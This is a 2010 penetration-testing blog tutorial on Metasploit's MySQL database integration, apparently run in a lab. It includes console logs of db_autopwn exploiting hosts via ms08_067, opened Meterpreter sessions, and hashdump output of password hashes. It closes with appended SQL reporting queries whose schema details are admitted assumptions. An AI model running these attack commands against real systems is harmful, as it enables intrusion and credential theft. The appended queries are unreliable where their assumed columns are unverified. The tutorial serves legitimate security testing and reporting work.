Nov 21, 2010
Metasploit with MySQL in BackTrack 4 r2
Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MySQL, but it was not an altogether seamless experience. Now, however, Metasploit and MySQL work together "out of the box", so we thought it would be worthwhile to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. Quite a number of additional database commands have also been added to Metasploit, and online documentation tends to be rather sparse when it comes to the less "glamorous" side of database management.
[cc lang="bash"]root@bt:~# msfconsole

                =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3[/cc]
We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.
[cc lang="bash"]msf > db_driver mysql
[*] Using database driver mysql
msf > /etc/init.d/mysql start
[*] exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*] Usage: db_connect <user:pass>@<host:port>/<database>
[*]    OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*]    db_connect user@metasploit3
[*]    db_connect user:pass@192.168.0.2/metasploit3
[*]    db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3[/cc]
In order to have some hosts to use as targets, and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit automatically detects the file type and imports it for us.
[cc lang="bash"]msf > db_import /root/nessus_report_EDB.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus[/cc]
After the successful import, our database is populated with a number of hosts. Running db_hosts queries the database and lets us customize which columns are shown.
[cc lang="bash"]msf > db_hosts -h
Usage: db_hosts [-h|--help] [-u|--up] [-a <addr1,addr2>] [-c <col1,col2>] [-o output-file <file>]

  -a <addr1,addr2>  Search for a list of addresses
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format

Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at

msf > db_hosts -c address,mac

Hosts
=====

address         mac
-------         ---
192.168.69.100  00:0C:29:DE:1A:00
192.168.69.105  00:0C:29:9A:FC:E0
192.168.69.110  00:0C:29:69:9C:44
192.168.69.130  00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141  00:0C:29:F3:40:70
192.168.69.142  00:0C:29:57:63:E2
192.168.69.143  00:0C:29:32:29:79
192.168.69.146
192.168.69.171  00:0C:29:EC:23:47
192.168.69.173  00:0C:29:45:7D:33
192.168.69.175  00:0C:29:BB:38:53
192.168.69.199  00:0C:29:58:09:DA
192.168.69.50[/cc]
Far more interesting than IP and MAC addresses are the services running on our target systems, which is what db_services shows us.
[cc lang="bash"]msf > db_services -h
Usage: db_services [-h|--help] [-u|--up] [-a <addr1,addr2>] [-r <proto>] [-p <port1,port2>] [-n <name1,name2>]

  -a <addr1,addr2>  Search for a list of addresses
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -n <name1,name2>  Search for a list of service names
  -p <port1,port2>  Search for a list of ports
  -r <proto>        Only show [tcp|udp] services
  -u,--up           Only show services which are up

Available columns: created_at, info, name, port, proto, state, updated_at

msf > db_services -c name,port,proto

Services
========

name            port  proto  Host            Workspace
----            ----  -----  ----            ---------
192.168.69.100  123   udp    192.168.69.100  default
192.168.69.100  135   tcp    192.168.69.100  default
192.168.69.100  137   udp    192.168.69.100  default
192.168.69.100  139   tcp    192.168.69.100  default
192.168.69.100  445   tcp    192.168.69.100  default
192.168.69.100  3389  tcp    192.168.69.100  default
192.168.69.105  123   udp    192.168.69.105  default
...snip...[/cc]
Most interesting of all is the list of vulnerabilities that the vulnerability scan mapped to our specific targets. The db_vulns command lists each vulnerability along with its corresponding reference numbers, where applicable.
[cc lang="bash"]msf > db_vulns
[*] Time: Sat Nov 20 20:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26920 refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26919 refs=CVE-1999-0505
...snip...[/cc]
For the sake of brevity, we will simply let db_autopwn exploit the low-hanging fruit for us, running only exploits with at least a "good" rating.
[cc lang="bash"]msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
msf > db_autopwn -x -e -R good
[*] (1/30 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139...
[*] (2/30 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139...
...snip...
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 20 15:45:24 -0500 2010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 20 15:45:24 -0500 2010
[*] (30/30 [2 sessions]): Waiting on 2 launched modules to finish execution...
[*] (30/30 [2 sessions]): Waiting on 0 launched modules to finish execution...[/cc]
In a brief amount of time, Metasploit has delivered two Meterpreter sessions to us.
[cc lang="bash"]msf > sessions -l

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32                                          192.168.69.140:54342 -> 192.168.69.105:34160
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ V-XPSP2-TEMPLAT   192.168.69.140:53895 -> 192.168.69.100:30423[/cc]
Running db_exploited now lists not only the hosts that were exploited but also the port and the exploit module that succeeded against each of them.
[cc lang="bash"]msf > db_exploited
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445 proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.[/cc]
Post-exploitation is critical, and credentials gathered along the way can frequently be used to penetrate deeper into a target network. Metasploit provides the db_add_cred command, which lets you insert credentials into the database as you come across them during an engagement.
[cc lang="bash"]msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >[/cc]
All of these database features are powerful and exciting, but just as exciting is that everything gathered during your session is now available directly in MySQL.
[cc lang="mysql"]root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use msf3;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_msf3              |
+-----------------------------+
| attachments                 |
| attachments_email_templates |
| campaigns                   |
| clients                     |
| creds                       |
| email_addresses             |
| email_templates             |
| events                      |
| exploited_hosts             |
| hosts                       |
| imported_creds              |
| loots                       |
| notes                       |
| project_members             |
| refs                        |
| report_templates            |
| reports                     |
| schema_migrations           |
| services                    |
| tasks                       |
| users                       |
| vulns                       |
| vulns_refs                  |
| web_forms                   |
| web_pages                   |
| web_sites                   |
| web_templates               |
| web_vulns                   |
| wmap_requests               |
| wmap_targets                |
| workspaces                  |
+-----------------------------+
31 rows in set (0.00 sec)[/cc]
We can now run ordinary SQL queries to access all of the information gathered on exploited hosts, collected credentials, and much more.
[cc lang="mysql"]mysql> select * from exploited_hosts;
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| id | host_id | service_id | session_uuid | name                                | payload                              | created_at          | updated_at          |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
|  1 |      14 |        131 | oc5vd2zl     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
|  2 |      15 |        137 | qwtwtqfj     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| id | service_id | created_at          | updated_at          | user          | pass                                                                                   | active | proof | ptype    | source_id | source_type |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
|  1 |        131 | 2010-11-20 20:54:36 | 2010-11-20 20:54:36 | Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: |      1 | NULL  | password |      NULL |        NULL |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
1 rows in set (0.00 sec)

mysql>[/cc]
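The raw tables above store hosts and services as integer ids, so a report query has to join them back together. The following queries are an added example written for this post (not from the original article or from the Metasploit project) against the msf3 database as shown in the show tables output: they resolve exploited_hosts, creds and vulns (the db_exploited, db_creds and db_vulns listings seen earlier) into addresses, ports and reference ids. The column names that appear in the post's output are used directly; the foreign keys services.host_id and vulns.host_id, the refs.name column and the vulns_refs(vuln_id, ref_id) join table are assumptions about the schema of that era and should be confirmed with `describe services;` and friends before the queries are trusted.

```sql
-- Added example reporting queries for the msf3 database (MySQL syntax).
-- Not part of the original post. Columns visible in the post's output are
-- used as-is; services.host_id, vulns.host_id, refs.name and the
-- vulns_refs(vuln_id, ref_id) join table are ASSUMPTIONS about the schema
-- of that era: verify with `describe <table>;` before relying on them.
use msf3;

-- 1. Which hosts were compromised, through which service, by which module?
--    Turns the host_id/service_id integers in exploited_hosts into the
--    address and port a report actually needs.
select h.address,
       s.port,
       s.proto,
       e.name       as exploit_module,
       e.payload,
       e.created_at as exploited_at
from exploited_hosts e
join hosts    h on h.id = e.host_id
join services s on s.id = e.service_id
order by e.created_at, h.address;

-- 2. Credentials recorded with db_add_cred, tied to the host and service
--    they came from, so nothing in creds is an orphaned blob.
select h.address,
       s.port,
       s.proto,
       c.user,
       c.ptype,
       c.pass,
       c.active
from creds c
join services s on s.id = c.service_id
join hosts    h on h.id = s.host_id
order by h.address, s.port;

-- 3. The db_vulns listing reproduced in SQL: every imported finding with its
--    reference ids collapsed onto one line. services is LEFT JOINed because
--    some findings (the first db_vulns line above) have no port at all.
select h.address,
       s.port,
       s.proto,
       v.name as vuln,
       group_concat(r.name order by r.name separator ',') as refs
from vulns v
join hosts h on h.id = v.host_id
left join services   s  on s.id = v.service_id
left join vulns_refs vr on vr.vuln_id = v.id
left join refs       r  on r.id = vr.ref_id
group by v.id, h.address, s.port, s.proto, v.name
order by h.address, s.port;

-- 4. Remediation tracking: hosts that carry at least one CVE-tagged finding
--    but never appear in exploited_hosts. These are the open items that
--    still need manual verification rather than a closed finding.
select h.address,
       count(distinct v.id) as cve_tagged_vulns
from hosts h
join vulns      v  on v.host_id = h.id
join vulns_refs vr on vr.vuln_id = v.id
join refs       r  on r.id = vr.ref_id and r.name like 'CVE-%'
left join exploited_hosts e on e.host_id = h.id
where e.id is null
group by h.id, h.address
order by cve_tagged_vulns desc;
```

Queries 1 and 2 are the same data db_exploited and db_creds print from the console, which makes them a quick way to confirm the console and the database agree after an import. Query 4 is the one that matters for the reporting use case the post closes with: a scanner finding that was never confirmed is a different line item in a report than a confirmed compromise, and the database makes that distinction a single query.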
At first glance, database integration may not seem that compelling, but it opens the door for the community to develop customized reporting applications on top of a database as widely used as MySQL, easing the post-penetration-test reporting burden.
For further details on setting up and using the various databases in Metasploit, check out the Using the MSF Database section in Metasploit Unleashed.